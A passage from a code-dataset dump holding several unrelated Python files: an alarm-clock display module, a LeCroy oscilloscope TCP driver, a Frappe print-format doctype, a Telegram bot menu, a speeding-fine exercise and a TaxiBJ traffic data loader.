self.s_font)[0])\n\n elif mod_alarm.mod_part == \"min\":\n date = mod_alarm.a_datetime\n above = (date + timedelta(minutes=-1)).strftime(\"%M\")\n text = date.strftime(\"%H:%M\")\n below = (date + timedelta(minutes=+1)).strftime(\"%M\")\n\n hour = (date + timedelta(minutes=+1)).strftime(\"%H:\")\n\n x_0 = (\n dispWidth - draw.textsize(text, self.s_font)[0]) / 2\n x_1 = x_0 + draw.textsize(hour, self.s_font)[0]\n x_2 = x_0 + draw.textsize(text, self.s_font)[0]\n\n if mod_alarm.mod_part in [\"h\", \"min\"]:\n draw.rectangle(\n [(x_1-1, y_2+1), (x_2+1, y_3-1)], outline=\"white\")\n draw.text((x_1, y_1), above, \"white\", self.s_font)\n draw.text((x_0, y_2), text, \"white\", self.s_font)\n draw.text((x_1, y_3), below, \"white\", self.s_font)\n\n elif mod_alarm.mod_part == \"sound\":\n sel = self.Main.Alarm.sound_selected\n sounds = self.Main.Speakers.sounds_list\n x = 3\n text = sounds[sel]\n if sel-1 < 0:\n above = \"\"\n else:\n above = sounds[sel-1]\n if sel+1 > len(sounds)-1:\n below = \"\"\n else:\n below = sounds[sel+1]\n\n draw.text((x, y_1), above, \"white\", self.s_font)\n draw.text((x, y_2), text, \"white\", self.s_font)\n draw.text((x, y_3), below, \"white\", self.s_font)\n\n elif mod_alarm.mod_part == \"light\":\n sel = self.Main.Alarm.light_selected\n lights = self.Main.Alarm.light_opt\n x = 3\n text = lights[sel]\n if sel-1 < 0:\n above = \"\"\n else:\n above = lights[sel-1]\n if sel+1 > len(lights)-1:\n below = \"\"\n else:\n below = lights[sel+1]\n\n draw.text((x, y_1), above, \"white\", self.s_font)\n draw.text((x, y_2), text, \"white\", self.s_font)\n draw.text((x, y_3), below, \"white\", self.s_font)\n\n elif mod_alarm.mod_part == \"light_delay\":\n delay = self.Main.Alarm.light_delay\n text = str(delay)\n if delay-1 < 0:\n above = \"\"\n else:\n above = str(delay-1)\n if delay+1 > 30:\n below = \"\"\n else:\n below = str(delay+1)\n\n x = (dispWidth -\n draw.textsize(str(delay), self.s_font)[0]) / 2\n\n draw.text((x, y_1), above, \"white\", 
self.s_font)\n draw.text((x, y_2), text, \"white\", self.s_font)\n draw.text((x, y_3), below, \"white\", self.s_font)\n\n def build_topbar(self, draw):\n\n # clock\n clock_text = \"{} : {}\".format(self.h, self.m)\n\n x_clock_size = draw.textsize(clock_text, self.s_font)[0]\n x_clock = dispWidth - x_clock_size\n y_clock = 0\n\n draw.text((x_clock, y_clock), clock_text, \"white\", self.s_font)\n\n if self.Main.menu_mode == \"alarm_set\":\n x_txt = 0\n y_txt = 0\n if self.Main.Alarm.mod_alarm.mod_part in [\"h\", \"min\"]:\n draw.text((x_txt, y_txt),\n \"Zeit\", \"white\", self.s_font)\n elif self.Main.Alarm.mod_alarm.mod_part in [\"sound\"]:\n draw.text((x_txt, y_txt),\n \"Weckton\", \"white\", self.s_font)\n elif self.Main.Alarm.mod_alarm.mod_part in [\"light\"]:\n draw.text((x_txt, y_txt),\n \"Wecklicht\", \"white\", self.s_font)\n\n # radio\n elif self.Main.Speakers.crr_station is not None:\n radio_text = self.Main.Speakers.crr_station\n x_radio_text = 0\n y_radio_text = 0\n\n draw.text((x_radio_text, y_radio_text),\n radio_text, \"white\", self.s_font)\n\n # alarm symbol\n elif self.Main.Alarm.is_set24(): # only if radio is off\n alarm_sym = \"\\uf017\" # clock\n x_alarm_sym = 0\n y_alarm_sym = 0\n draw.text((x_alarm_sym, y_alarm_sym),\n alarm_sym, \"white\", self.awe_font)\n\n self.disp_update = False\n\n def set_menu_text(self, menu_text=None):\n ''' If no text is given grabs the current menu text.\n '''\n if menu_text is None:\n try:\n menu_text = self.Main.Menu.getMenuText()\n except AttributeError:\n menu_text = \"\" # booting, Menu not yet instantiated.\n self.menu_text = menu_text\n self.disp_update = True\n\n def set_disp_mode(self, disp_mode):\n ''' Set the mode of the display\n 0 = off\n 1 = menu\n 2 = big clock\n 3 = multiline\n 4 = set alarm clock\n '''\n if self.disp_mode == disp_mode:\n return\n # don't go from alarm settings into fullscreen\n if (self.disp_mode == 3 or self.disp_mode == 4) and disp_mode == 2:\n return\n # if disp_mode == 2:\n # self.Main.menu_mode = \"full_screen\"\n self.disp_mode = disp_mode\n self.disp_update = True\n\n\ndef disp_off():\n with canvas(disp) as draw:\n draw.text((0, 0), \"\", \"white\")\n\n\ndef make_font(name, size):\n font_path = str(Path(__file__).resolve().parent / \"fonts\" / name)\n return ImageFont.truetype(font_path, size)\n","sub_path":"dispmod.py","file_name":"dispmod.py","file_ext":"py","file_size_in_byte":12375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"80172915","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport socket,sys,time\nimport collections\nimport binascii\n\n\n\ndef closerVal(val, nlist=[0.001, 0.002, 0.005, 0.01, 0.02, 0.05, 0.1, 0.2, 0.5, 1, 2, 5, 10]):\n \"\"\"\n take the closer value 'floor' under the select value in the selected list\n returns the list (one under, closer, one above, value)\n used to select the calibre of the oscillo\n => closerVal(x)[0] => zoom in\n => closerVal(x)[2] => zoom out\n \"\"\"\n i, closer =min(enumerate(nlist), key=lambda x:abs(x[1]-val))\n above = nlist[i+1] if i < len(nlist)-1 else nlist[-1]\n under = nlist[i-1] if i > 0 else closer\n return under, closer, above, val\n\n\n\nclass OscilloWavePro:\n Measure = collections.namedtuple('Measure',\n 'SLOT TEXT AVG HIGH LAST LOW SIGMA SWEEPS')\n \n BUFFER_SIZE = 1024\n\n def __init__(self, ip='192.168.0.45', port=1861):\n self.name= \"WavePro735Zi\"\n self.ip=ip\n self.port=port\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.s.settimeout(2)\n 
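        # A 2 s timeout applies to every blocking recv() on this socket
        # (see purge() and sendBytes()), so a hung scope raises
        # socket.timeout instead of blocking the caller indefinitely.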
self.connect()\n self.response = \"\"\n self.response_header = None\n# self.idn = self.send(\"*IDN?\")\n \n\n def __del__(self):\n self.s.close()\n\n def close(self):\n del(self)\n\n def connect(self):\n self.s.connect((self.ip, self.port))\n\n def send(self, MESSAGE=\"*IDN?\"):\n tmp = self.sendBytes(MESSAGE.encode('ascii'))\n tmp = tmp[:-1]\n tmp = tmp[8:].decode('ascii')\n self.response = tmp\n return self.response\n\n \n def get(self):\n return self.s.recv(self.BUFFER_SIZE)\n\n def purge(self):\n try:\n self.s.recv(self.BUFFER_SIZE)\n except socket.timeout:\n pass\n \n\n def getVal(self, req):\n \"\"\"\n convenient generic function send request return\n WARNING could not work for some specifics\n Work with ie. #=> getVal(\"C1:VDIV?\") ==> C1:VDIV 20E-3 V => 20E-3\n IndexError: list index out of range *ù$! peut arriver\n ==> lancer self.s.recv(self.BUFFER_SIZE)\n ==> lancer osc.s.recv(osc.BUFFER_SIZE)\n pour purger\n \"\"\"\n self.send(req)\n ret=self.response.split(' ')[1]\n return float(ret)\n\n def pava(self,ps=(\"MIN\", \"MAX\"), ch=1):\n \"\"\"osc.pava((\"MEAN\",), 1) or osc.pava((\"MEAN\",\"MAX\"), 1)\n \"\"\"\n ret=self.send(\"C{}:PAVA? \".format(ch)+', '.join(ps)).split(\"PAVA \")[1]\n return [float(ret.split(p+',')[1].split(' ')[0]) for p in ps]\n # tmp=self.send(\"C{}:PAVA? \".format(ch)+', '.join(ps))\n # tmp=tmp.replace('MIN,', ' ').replace('MAX,', ' ').split(' ')\n # return [float(tmp[i]) for i in range(2,2*len(ps)+1,2)]\n\n def clearSweeps(self):\n self.send(\"CLSW\")\n\n def setCaliber(self, ch, vdiv, offset=0):\n self.send(\"C{}:VDIV {}; C{}:OFST {}\".format(ch, vdiv, ch, offset))\n\n def ymix(self, ch):\n tmp=self.send(\"C{}:PAVA? MIN, MAX\".format(ch))\n # tmp=\"C1:PAVA MIN,11E-3 V,OK,MAX,503E-3 V,OK\"\n tmp=tmp.replace('MIN,', ' ').replace('MAX,', ' ').split(' ')\n # mini=float(tmp[2]); maxi=float(tmp[4])\n return [float(tmp[i]) for i in (2,4)]\n\n def getPmax(self, ch=1, NUM1=3, restore=False):\n self.clearSweeps()\n old_P = self.getMeasureSlot(1), self.getMeasureSlot(2) if restore else None\n self.setMeasureSlot(1, 'MIN, C{}'.format(ch))\n self.setMeasureSlot(2, 'MAX, C{}'.format(ch))\n NUM=0\n while NUM(3+NDIV)*vdiv:\n vdiv=closerVal(vdiv)[2]\n self.send(\"C{}:VDIV {}; C{}:OFST {}\".format(\n CH, vdiv, CH, -NDIV*vdiv))\n while float(self.getMeasurement(PX).SWEEPS) <= 2:\n pass\n ymax=float(self.getMeasurement(PX).AVG)\n\n vdiv=self.getVal(\"C{}:VDIV?\".format(CH))\n if ZOOM:\n vdiv=ymax/(2+NDIV)\n self.send(\"C{}:VDIV {}\".format(CH, vdiv))\n return vdiv\n\n def mkdir(self, dirname='D:\\LARZIC\\CH2'):\n \"\"\" Danger, does not create parent direcory \"\"\"\n self.send(\"DIRectory DISK,HDD,ACTION,CREATE,'{}'\".format(dirname))\n\n def saveDir(self, dirname='D:\\LARZIC\\CH2'):\n self.send(\"vbs 'app.SaveRecall.Waveform.WaveformDir=\\\"{}\\\"'\".format(dirname))\n\n def saveCurve(self,CurvName=\"OUT\", Curve=None):\n self.send(\"vbs 'app.SaveRecall.Waveform.SaveSource=\\\"{}\\\"'\".format(Curve)) if Curve else None\n self.send(\"vbs 'app.SaveRecall.Waveform.TraceTitle=\\\"{}\\\"'\".format(CurvName))\n self.send(\"vbs 'app.SaveRecall.Waveform.DoSave'\")\n\n def optimizeCaliber(self, ch, start1VperDiv=False):#, nSweeps=0):\n \"\"\"\n set vertical caliber and cursor of the given channel to use\n all the screen available for display.\n \"\"\"\n NDIV = 6\n \n # we need to mesure min and max, but we save the current parameters\n # to restore them afterwards\n old_params = self.getMeasureSlot(1), self.getMeasureSlot(2)\n self.setMeasureSlot(1, 'MIN, C{}'.format(ch))\n 
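        # Measurement slots P1/P2 are temporarily repurposed to track the
        # running MIN/MAX of the channel; the original slot definitions saved
        # in old_params are re-sent once the caliber has converged.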
self.setMeasureSlot(2, 'MAX, C{}'.format(ch))\n\n # start with cursor in the middle of the screen and \n # a 1V/div caliber. The signal should hopefully fit on the screen.\n if start1VperDiv:\n vdiv = 1\n offset = 0\n else:\n vdiv = float(self.getVal(\"C{}:VDIV?\".format(ch)))\n offset = float(self.getVal(\"c{}:OFST?\".format(ch)))\n\n redo = True\n while (redo):\n self.setCaliber(ch, vdiv, offset) \n # acq_ok = 0\n # while not acq_ok:\n # self.send(\"INR?\")\n # acq_ok = int(self.response.split(' ')[1]) & 1\n \n # typical response\n #C1:PAVA MIN,11E-3 V,OK,MAX,503E-3 V,OK\n # tmp = self.response.split(',')\n self.send(\"CLSW;ARM;WAIT\")\n ymin = float(self.getMeasurement(1).AVG) \n ymax = float(self.getMeasurement(2).AVG)\n self.send(\"TRMD AUTO\")\n\n self.send(\"C{}:PAVA? MIN, MAX\".format(ch))\n tmp = self.response.split(',')\n ok = tmp[2]=='OK' and tmp[5]=='OK'\n\n old_vdiv = vdiv\n old_offset = offset\n vdiv = (ymax-ymin)/NDIV if ok else 1\n offset = -(ymin+ymax)/2 if ok else 0\n #print ymin, ymax, vdiv, old_vdiv\n\n redo = abs(old_vdiv - vdiv)/vdiv > 0.01\n\n # restore old parameters\n self.send(old_params[0])\n self.send(old_params[1])\n\n def avgs(self):\n measures=self.send(\"PAST? CUST, AVG\").split('AVG,')[1].split(',')\n measures=[m.split(' V')[0].split(' S')[0] for m in measures]\n return measures\n\n def yfit(self,ch=1,**kwargs):\n vdivNotMin=True\n loop=0\n self.clearSweeps()\n vdiv, offset, ymin, ymax, gmax, gmin=self.getFrame(ch)\n if (ymin>gmax or ymax=gmax: # TODO : traiter a part le cas ymax>=gmax and ymin>gmin\n loop+=1\n vdiv = closerVal(vdiv)[2]# closerVal((ymax-ymin)/NDIV)[0]\n # if ymin>gmin:# sinon on ne touche pas a offset\n # offset=-ymin-3*vdiv\n self.setCaliber(ch,vdiv, offset)\n ymin, ymax=self.pava((\"MIN\", \"MAX\"),ch)\n# ymin, ymax=self.getPmax(ch, **kwargs)\n gmax = 4*vdiv-offset; gmin = -4*vdiv-offset\n while ymin<=gmin: # TODO : traiter a part le cas ymax 0.001 and vdivNotMin):\n loop+=1\n vdiv = closerVal(vdiv)[0]# closerVal((ymax-ymin)/NDIV)[0]\n offset = -(ymax+ymin)/2\n self.setCaliber(ch,vdiv, offset)\n vdivNotMin = True if vdiv == self.getVal(\"C{}:VDIV?\".format(ch)) else False\n ymin, ymax=self.pava((\"MIN\", \"MAX\"),ch)\n# ymin, ymax=self.getPmax(ch, **kwargs)\n gmax = 4*vdiv-offset; gmin = -4*vdiv-offset\n # final zoom when ymax and ymin are in the screen for sure:\n # vdiv, offset, ymin, ymax, gmax, gmin=getFrame(osc,ch)\n vdiv, offset, ymin, ymax, gmax, gmin=self.getFrame(ch, **kwargs)\n vdiv=(ymax-ymin)/6\n offset=-(ymax+ymin)/2\n self.setCaliber(ch,vdiv, offset)\n return loop\n\n#__________________\n \n def zoomCalibre(self):\n vdiv=self.getVal(\"VDIV?\")\n vdiv=closerVal(float(vdiv))[0]\n self.send(\"VDIV {}\".format(vdiv))\n\n def unzoomCalibre(self):\n vdiv=self.getVal(\"VDIV?\")\n vdiv=closerVal(float(vdiv))[0]\n self.send(\"VDIV {}\".format(vdiv))\n \n def beep(self,N=2):\n [self.send(\"BUZZ BEEP\") for i in range(N)]\n \n def setMaxZoom(self, CH=1, PX=None, ZM=2, NUM=2):\n \"\"\"\n zoom to the parameter \"ie maximum\" between +/- sdev (SIGMA)\n Warning, OFFSET cannot be above 1V or under -1V. why ?...\n (I can hear the relay clicking , changing some param in the scope)\n if VDIV<=100mv .. pfff. give-up that function\n \"\"\"\n PX=CH if PX is None else PX\n while float(self.getMeasurement(PX).SWEEPS) <= NUM:\n pass\n ret=self.getMeasurement(PX)\n self.send(\"C{}:VDIV {};C{}:OFST {}\".format(\n CH, ZM*float(ret.SIGMA), CH, -float(ret.AVG)))\n\n def pp_digital(self, pp=True):\n s1,s2=[int(self.send(\"vbs? 
return=app.LogicAnalyzer.Digital{}.Out.Result.Samples\".format(i)).strip(\"^VBS \")) for i in range(1,3)]\n l1,l2=[int(self.send(\"vbs? return=app.LogicAnalyzer.Digital{}.Out.Result.Lines\".format(i)).strip(\"^VBS \")) for i in range(1,3)]\n if pp:\n print(\"Digital1:{}-bit, Digital2:{}-bit, resp. with {}, and {} samples\".format(l1,l2,s1,s2))\n return(l1,l2,s1,s2)\n \n def getDigitalBus(self, setup=2, sample=1, pp=True):\n cmd_line = \":\".join([\"VBS? '\",\n \"lines = app.LogicAnalyzer.Digital%d.Out.Result.Lines\" % setup,\n \"val=0\", \n \"res = app.LogicAnalyzer.Digital%d.Out.Result.DataArray(1,-1,%d,0)\" % (setup, sample),\n \"for line = 0 To lines-1\",\n \"val=val + res(0,line)*2^line\",\n \"Next\",\n \"return=val\"\n ]) \n samples = self.send(cmd_line)\n ret=samples.lstrip(\"VBS \")\n if pp:\n print(ret+\"=\"+hex(int(ret))+\"=\"+format(int(ret), '#018b')+\" ROW_{} COL_{}\".format(int(ret)&0x7F, int(ret)>>7))\n return ret\n\n def getDigitalWaveForm(self, setup=1, line= 1):\n \"\"\" electronics.stackexchange.com/questions/430542/reading-digital-wafevorms-via-vxi11-from-the-lecroy-wavesurfer-510-ms-500\n \"\"\"\n cmd_line = \":\".join([\"VBS? 't=\\\"\\\"\",\n \"num_samples = app.LogicAnalyzer.Digital{}.Out.Result.Samples\".format(setup),\n \"sample=0\", \n \"last_sample=255\",\n \"res = app.LogicAnalyzer.Digital{}.Out.Result.DataArray(-1,1,0,{})\".format(setup, line),\n \"for j = 0 To num_samples-1\",\n \"sample = res(j,0)\",\n \"If ( (last_sample) <> (sample) ) Then \" \"last_sample=sample:t = t & sample & \\\"@\\\" & j & \\\",\\\" \" \"End If\",\n \"Next\",\n \"return=t\"\n ]) \n return self.send(cmd_line).lstrip(\"VBS \")\n\n def getDigitalWaveForms(self):\n n1,n2=self.pp_digital(False)[0:2]\n print(\"Digital1:\")\n for n in range(1,n1+1):\n print(self.getDigitalWaveForm(1,n))\n print(\"Digital2:\")\n for n in range(n2):\n print(self.getDigitalWaveForm(2,n))\n \n \n def getFile(self, remote_path, local_path):\n \"\"\"\n Get a file from the remote Lecroy file system to our local drive using the TRFL function.\n \n This makes the scope send a bunch of weird 0x82 operation, sometimes in the same TCP\n packets containing the wanted file. As far as I can tell, the 0x82 operation send by the\n scope in response are as follow:\n - 5 bytes b'TRFL '\n - 11 bytes starting with b'#' and a large number (don't know what it is)\n - the wanted file in chuncks of 1683384 bytes\n \n I just ignore the first 2 0x82 operations and write to disk the payload of all the \n subsequent ones.\n Finally the scope sends an empty 0x83 operation signaling the end of the file transfer\n \"\"\"\n cmd = f\"TRFL? 
DISK,HDD,FILE, {remote_path}\".encode('ascii')\n tmp = self.sendBytes(cmd)\n \n with open(local_path, 'wb') as wfile:\n end_ = False\n op_number = 0\n tmp_idx = 0\n \n while not end_:\n\n if tmp[tmp_idx:tmp_idx+4] == binascii.unhexlify('82010100'):\n op_number += 1\n op_len = int.from_bytes(tmp[tmp_idx+4:tmp_idx+8], byteorder='big')\n if tmp_idx+op_len+8 >= len(tmp):\n tmp += self.s.recv(self.BUFFER_SIZE)\n else:\n payload = tmp[tmp_idx+8:tmp_idx+op_len+8]\n if op_number > 2:\n wfile.write(payload)\n tmp_idx += op_len+8\n elif tmp[tmp_idx:tmp_idx+4] == binascii.unhexlify('83010100'):\n end_ = True\n else:\n print(tmp, op_number, tmp_idx, len(tmp))\n raise ValueError(\"Cannot understand scope response\")\n \n \n def sendBytes(self, MESSAGE=b\"*IDN?\"):\n TAILLE = len(b\"\" + MESSAGE)\n HEADER = \"81\"+\"01\"+\"01\"+\"00\"+ (\"%08x\" % TAILLE)\n msg = binascii.unhexlify(HEADER) + MESSAGE\n\n try:\n self.s.send(msg)\n if b'?' in MESSAGE:\n psn = None\n tmp = b''\n while tmp[-1:] != b'\\n':\n tmp += self.s.recv(self.BUFFER_SIZE)\n if psn is None:\n operation = tmp[0]\n prot_ver = tmp[1]\n if (operation != 0x83 and operation != 0x82) or prot_ver != 1:\n raise ValueError(\"Cannot understand scope response\")\n sn = tmp[2]\n #if sn != psn + 1:\n # print(\"Warnning: unxpected sequence number, ignoring data\")\n # return \"\"\n psn = sn \n data_len = int.from_bytes(tmp[4:8], byteorder='big')\n if operation == 0x82:\n break \n self.response = tmp\n return self.response\n except socket.error as e:\n self.connect()\n self.send(msg)\n \n\n#USAGE for shell test (not import from python)\n#python drivers/OscilloWavePro.py -ip '192.168.0.48' -port 5025\nif __name__ == '__main__':\n import readline\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-ip', default='169.254.222.45')\n parser.add_argument('-port', default=4000)\n args = parser.parse_args()\n ip=args.ip\n print(\"Si ca marche pas, un autre process doit etre en marche -> kill\")\n ws = OscilloWavePro(ip)\n print(\"Connected ?\")\n print( \"\"\" ____exemple:____ respond\n C1:VDIV? #<== Voltage / division of channel 1\n TDIV? #<== time / division\n TDIV 1E-3 #<== above 50us allowed when SetMaximumMemory set!\n PAST? CUST,P1 #<== measure given by param 1 , mean, max, sdev...\n SCDP #<== screen dump = save to file.png\n C1:OFfSeT? #<== OFST, gives the offset of channel 1\n PACU? 1 #<== reply how is set the parameter 1\n C2:TRA OFF #<== disable 'Trace On' for C2 curve\n F1:DEF? #<== syntax definition of math function\n C1:ASET FIND #<== put channel 1 in a window scale (offest and div)\n BUZZ BEEP; BUZZ BEEP #<== 2beep sound emitted by the scope\n DIRectory DISK,HDD,ACTION,CREATE,'D:\\LARZIC\\CH2' #<== create directory\n # set manually a parameter then ask 'PACU? 1' what is the syntax\n PACU 3, DDLY, C1, C2 #<== set param 1 as the delay between ch1 and ch2\n VBS 'app.Acquisition.Trigger.C2.Level=0.055' #<== more advanced features\n vbs 'app.SystemControl.CloseDialog' #<== close the bottom panel if opened\n \"\"\" )\n print( 'to (q)uit type q\\n')\n\n msg = \"*IDN?\"\n while msg != 'q':\n ws.send(msg)\n if '?' in msg:\n print( ws.response)\n msg = raw_input('>')\n ws.close()\n","sub_path":"drivers/OscilloWavePro_.py","file_name":"OscilloWavePro_.py","file_ext":"py","file_size_in_byte":20856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"299852115","text":"# Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors\n# MIT License. 
See license.txt\n\nfrom __future__ import unicode_literals\nimport frappe, os\nimport frappe.utils\nfrom frappe.modules import get_doc_path\n\nstandard_format = \"templates/print_formats/standard.html\"\n\nfrom frappe.model.document import Document\n\nclass PrintFormat(Document):\n\tdef validate(self):\n\t\tif self.standard==\"Yes\" and frappe.session.user != \"Administrator\":\n\t\t\tfrappe.throw(frappe._(\"Standard Print Format cannot be updated\"))\n\n\t\t# old_doc_type is required for clearing item cache\n\t\tself.old_doc_type = frappe.db.get_value('Print Format',\n\t\t\t\tself.name, 'doc_type')\n\n\tdef on_update(self):\n\t\tif hasattr(self, 'old_doc_type') and self.old_doc_type:\n\t\t\tfrappe.clear_cache(doctype=self.old_doc_type)\n\t\tif self.doc_type:\n\t\t\tfrappe.clear_cache(doctype=self.doc_type)\n\n\t\tself.export_doc()\n\n\tdef export_doc(self):\n\t\t# export\n\t\tif self.standard == 'Yes' and (frappe.conf.get('developer_mode') or 0) == 1:\n\t\t\tfrom frappe.modules.export_file import export_to_files\n\t\t\texport_to_files(record_list=[['Print Format', self.name]],\n\t\t\t\trecord_module=self.module)\n\n\tdef on_trash(self):\n\t\tif self.doc_type:\n\t\t\tfrappe.clear_cache(doctype=self.doc_type)\n\ndef get_args():\n\tif not frappe.form_dict.format:\n\t\tfrappe.form_dict.format = standard_format\n\tif not frappe.form_dict.doctype or not frappe.form_dict.name:\n\t\treturn {\n\t\t\t\"body\": \"\"\"
<h1>Error</h1>\n\t\t\t\t<p>Parameters doctype, name and format required</p>\n\t\t\t\t<pre>%s</pre>

<h1>Error</h1>\n\t\t\t\t\t<p>No {ptype} permission</p>
\"\"\".format(ptype=ptype)\n\t\t\t}\n\n\treturn {\n\t\t\"body\": get_html(doc),\n\t\t\"css\": get_print_style(frappe.form_dict.style),\n\t\t\"comment\": frappe.session.user\n\t}\n\ndef get_html(doc, name=None, print_format=None):\n\tfrom jinja2 import Environment\n\n\tif isinstance(doc, basestring) and isinstance(name, basestring):\n\t\tdoc = frappe.get_doc(doc, name)\n\n\ttemplate = Environment().from_string(get_print_format_name(doc.doctype,\n\t\tprint_format or frappe.form_dict.format))\n\tmeta = frappe.get_meta(doc.doctype)\n\n\targs = {\n\t\t\"doc\": doc,\n\t\t\"meta\": meta,\n\t\t\"frappe\": frappe,\n\t\t\"utils\": frappe.utils\n\t}\n\thtml = template.render(args)\n\treturn html\n\ndef get_print_format_name(doctype, format_name):\n\tif format_name==standard_format:\n\t\treturn format_name\n\n\t# server, find template\n\tpath = os.path.join(get_doc_path(frappe.db.get_value(\"DocType\", doctype, \"module\"),\n\t\t\"Print Format\", format_name), format_name + \".html\")\n\tif os.path.exists(path):\n\t\twith open(path, \"r\") as pffile:\n\t\t\treturn pffile.read()\n\telse:\n\t\thtml = frappe.db.get_value(\"Print Format\", format_name, \"html\")\n\t\tif html:\n\t\t\treturn html\n\t\telse:\n\t\t\treturn \"No template found.\\npath: \" + path\n\ndef get_print_style(style=None):\n\tif not style:\n\t\tstyle = frappe.db.get_default(\"print_style\") or \"Standard\"\n\tpath = os.path.join(get_doc_path(\"Core\", \"DocType\", \"Print Format\"), \"styles\",\n\t\tstyle.lower() + \".css\")\n\tif not os.path.exists(path):\n\t\tif style!=\"Standard\":\n\t\t\treturn get_print_style(\"Standard\")\n\t\telse:\n\t\t\treturn \"/* Standard Style Missing ?? */\"\n\telse:\n\t\twith open(path, 'r') as sfile:\n\t\t\treturn sfile.read()\n","sub_path":"frappe/core/doctype/print_format/print_format.py","file_name":"print_format.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"417417265","text":"import random\nimport telegram\n\nMENU = [[('handler', 'Venues ☕', 'foursquare-location-choice'),\n ('handler', 'Weather 🌤', 'weather-show'),\n ('handler', 'News 📰', 'news-get-entry')],\n [('handler', 'Vinci 🌇', 'vinci-upload-image'),\n ('handler', 'Get Uber 🚘', 'uber-choose-location'),\n ('handler', 'Wolfram 📊', 'wolfram-ask')],\n [('handler', '9GAG 😅', 'meme-show'),\n ('handler', 'Product Hunt 😺', 'producthunt-get-entry'), ],\n [('handler', 'Wikipedia 📚', 'wiki-search'),\n ('handler', 'Subscriptions 📬', 'subscriptions-show')],\n [('handler', 'Change location 🗺', 'location-new')]]\n\nGREETING_PHRASES = ['What do you want to do? 🤖',\n 'Do you need anything? 🤖',\n 'How can I help you today? 🤖',\n 'Any way I can help you? 
🤖']\n\n\ndef register(bot):\n bot.handlers['main-menu'] = main_menu\n\n bot.callback_handlers['main-menu-callback'] = main_menu_callback\n\n\ndef main_menu(message, bot, phrase=None):\n if not bot.user_get(message.u_id, 'registered'):\n bot.call_handler(message, 'welcome-message')\n return\n\n if not message.moved:\n for line in MENU:\n for row in line:\n if row[0] == 'handler' and row[1] == message.text:\n message.handler = row[2]\n return bot.call_handler(message, row[2])\n\n keyboard = get_keyboard()\n reply_markup = telegram.ReplyKeyboardMarkup(keyboard, resize_keyboard=True)\n bot.telegram.send_message(message.u_id, phrase or random.choice(GREETING_PHRASES),\n reply_markup=reply_markup)\n\n\ndef main_menu_callback(query, bot):\n query.message.moved = True\n bot.call_handler(query.message, 'main-menu')\n\n\ndef get_keyboard():\n keyboard = []\n for line in MENU:\n subkeyboard = []\n for row in line:\n if row[0] == 'handler':\n subkeyboard.append(row[1])\n if subkeyboard:\n keyboard.append(subkeyboard)\n return keyboard\n","sub_path":"modules/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"614562388","text":"#Exercício Python 029: Escreva um programa que leia a velocidade de um carro. Se ele ultrapassar 80Km/h, mostre uma\r\n# mensagem dizendo que ele foi multado. A multa vai custar R$7,00 por cada Km acima do limite.\r\n\r\nv_carro = int(input('Qual a velocidade do carro?'))\r\n\r\nif v_carro > 80:\r\n multa = float((v_carro - 80) * 7)\r\n print('MULTADO! Você excedeu o limite permitido de 80Km/h\\nVocê deve pagar uma multa de R${:.2f}'.format(multa))\r\nelse:\r\n print('Tenha um BOM DIA! Dirija com SEGURANÇA!')","sub_path":"ex029.py","file_name":"ex029.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"138309584","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport os\n# import cPickle as pickle\nimport pickle\nfrom copy import copy\nimport numpy as np\nimport h5py\nfrom utils.preprocessing import load_stdata, STMatrix\nfrom utils.preprocessing import MinMaxNormalization, remove_incomplete_days, timestamp2vec\n\n# from ..config import Config\nnp.random.seed(1337) # for reproducibility\n\n# parameters\n# DATAPATH = Config().DATAPATH\ndatapath = './datasets/TaxiBJ/'\n\n\ndef data_slide_window_timestamps(data, timestamps, meta_data, window_len=6):\n x, y, timestamps_X, meta_data_X = [], [], [], []\n for i in range(window_len, len(data)):\n # print(i)\n x.append([data[j] for j in range(i - window_len, i)])\n timestamps_X.append([timestamps[j] for j in range(i - window_len, i)])\n meta_data_X.append([meta_data[j] for j in range(i - window_len, i)])\n y.append(data[i])\n return x, y, timestamps_X, meta_data_X\n\n\ndef load_holiday(timeslots, fname=os.path.join(datapath, 'TaxiBJ', 'BJ_Holiday.txt')):\n f = open(fname, 'r')\n holidays = f.readlines()\n holidays = set([h.strip() for h in holidays]) # delete the blank of every string\n H = np.zeros(len(timeslots))\n for i, slot in enumerate(timeslots):\n if slot[:8] in holidays:\n H[i] = 1\n print(H.sum())\n # print(timeslots[H==1])\n return H[:, None]\n\n\n# holiday_test = load_holiday(timeslots=24)\n\n\ndef load_meteorol(timeslots, fname=os.path.join(datapath, 'TaxiBJ', 'BJ_Meteorology.h5')):\n '''\n timeslots: the predicted timeslots\n In real-world, we dont have the meteorol data in the 
predicted timeslot, instead, we use the meteoral at previous timeslots, i.e., slot = predicted_slot - timeslot (you can use predicted meteorol data as well)\n '''\n f = h5py.File(fname, 'r')\n Timeslot = f['date'].value\n WindSpeed = f['WindSpeed'].value\n Weather = f['Weather'].value\n Temperature = f['Temperature'].value\n f.close()\n\n M = dict() # map timeslot to index\n for i, slot in enumerate(Timeslot):\n M[slot] = i\n\n WS = [] # WindSpeed\n WR = [] # Weather\n TE = [] # Temperature\n for slot in timeslots:\n predicted_id = M[slot]\n cur_id = predicted_id - 1\n WS.append(WindSpeed[cur_id])\n WR.append(Weather[cur_id])\n TE.append(Temperature[cur_id])\n\n WS = np.asarray(WS)\n WR = np.asarray(WR)\n TE = np.asarray(TE)\n\n # 0-1 scale\n WS = 1. * (WS - WS.min()) / (WS.max() - WS.min())\n TE = 1. * (TE - TE.min()) / (TE.max() - TE.min())\n\n print(\"shape: \", WS.shape, WR.shape, TE.shape)\n\n # concatenate all these attributes\n merge_data = np.hstack([WR, WS[:, None], TE[:, None]])\n\n # print('meger shape:', merge_data.shape)\n return merge_data\n\n\n# def load_data(T=48, nb_flow=2, len_closeness=None, 